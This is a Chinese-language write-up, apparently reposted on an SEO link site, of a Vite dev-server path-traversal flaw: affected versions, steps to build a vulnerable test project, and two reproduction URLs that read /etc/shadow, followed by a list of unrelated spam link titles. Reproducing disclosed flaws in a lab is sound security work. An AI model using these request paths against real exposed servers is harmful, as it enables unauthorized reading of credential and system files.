当前位置: 首页 > wzjs >正文

阜阳做网站哪家好b站暴躁姐

wzjs 2025/8/25 8:17:43
阜阳做网站哪家好,b站暴躁姐,客户网站开发全流程图,中国b2b网站有哪些漏洞描述 该漏洞是由于 Vite 开发服务器在处理特定 URL 请求时,未对请求路径进行严格的安全检查和限制所致。攻击者可以利用这一漏洞绕过保护机制,未经授权地访问项目根目录之外的敏感文件。 利用条件:仅在 Vite 启动时使用了 --host 或配置…

漏洞描述

该漏洞是由于 Vite 开发服务器在处理特定 URL 请求时,未对请求路径进行严格的安全检查和限制所致。攻击者可以利用这一漏洞绕过保护机制,未经授权地访问项目根目录之外的敏感文件。

利用条件:仅在 Vite 启动时使用了 --host 或配置文件设置了 server.host 导致对外网暴露的开发环境中才会受影响。

影响版本

  • 6.2.0 <= Vite <= 6.2.4
  • 6.1.0 <= Vite <= 6.1.3
  • 6.0.0 <= Vite <= 6.0.13
  • 5.0.0 <= Vite <= 5.4.16
  • Vite <= 4.5.11

环境搭建

这里使用漏洞次新版:vite 6.2.4

1. 安装node 和 npm

# 添加 NodeSource 仓库(安装 18.x 或 20.x 都可以)
curl -fsSL https://deb.nodesource.com/setup_18.x | sudo -E bash -
# 安装 node 和 npm
sudo apt install -y nodejs
# 验证安装
node -v
npm -v

2. 创建项目,按照如下所示操作

npm create vite@latest
  • 项目名回车默认:vite-project
  • 选择框架 Vanilla
  • 选择 JavaScript

3. 项目生成好后,接下来运行项目

cd vite-project
#手动降级vite到 6.2.4 版本
npm install vite@6.2.4 --save-dev
#查看版本
npx vite -v

4. 新建 vite.config.js

// vite.config.js
export default {server: {host: true}
}

5. 最后运行

npm install
npm run dev

漏洞复现

/etc/shadow?.svg?.wasm?init
#或者
/@fs/x/x/x/vite-project/?/../../../../../etc/shadow?import&?raw

参考:https://github.com/vitejs/vite/security/advisories/GHSA-xcj6-pq6g-qj4x

http://www.dtcms.com/wzjs/478797.html

相关文章:

  • 哪种网站名称容易通过备案审核株洲网站设计外包首选
  • 遵义做手机网站建设网站收录入口申请查询
  • 顶级域名大全手机端网站优化
  • 北京建筑工程公司成都自然排名优化
  • 网站制作策划书宁波seo网络推广产品服务
  • 买网站去哪买网络营销方案设计范文
  • 网站建站与优化怎样做产品推广
  • 中煤第三建设集团网站提升seo排名的方法
  • 域名查询网138安卓优化大师破解版
  • 如何用织梦程序制作多个页面网站武汉百度关键词推广
  • 泉州专业网站建设百度竞价排名官网
  • 重庆网站建设排名百度免费网站制作
  • 在网站后台为什么不显示百分号百度推广手机登录
  • 企业微网站怎么做网站建设有多少公司
  • 网站建设易网拓网页制作的步骤
  • 合肥做淘宝网站百度云网盘搜索引擎
  • 网站空间知识网页设计代码
  • 河南旅游网站建设唯尚广告联盟app下载
  • 怎么给汽车网站做推广成都高端网站建设哪家好
  • 做网站 多少钱北京seo优化哪家公司好
  • 没有rss源的网站如何做rss订阅宁波seo网络推广渠道介绍
  • 网站开发的技术有百度快速排名用是
  • 机械行业网站建设方案河北搜索引擎优化
  • wordpress 不同面包屑网站seo诊断分析和优化方案
  • 赣州做网站的中层管理者培训课程有哪些
  • 网站地图格式免费做网站推广的软件
  • 推进网站 集约化建设写软文
  • 天元建设集团有限公司简介无锡谷歌优化
  • 网站个人和公司有什么区别是什么网址域名大全2345网址
  • 宁波网站建设招商加盟打开搜索引擎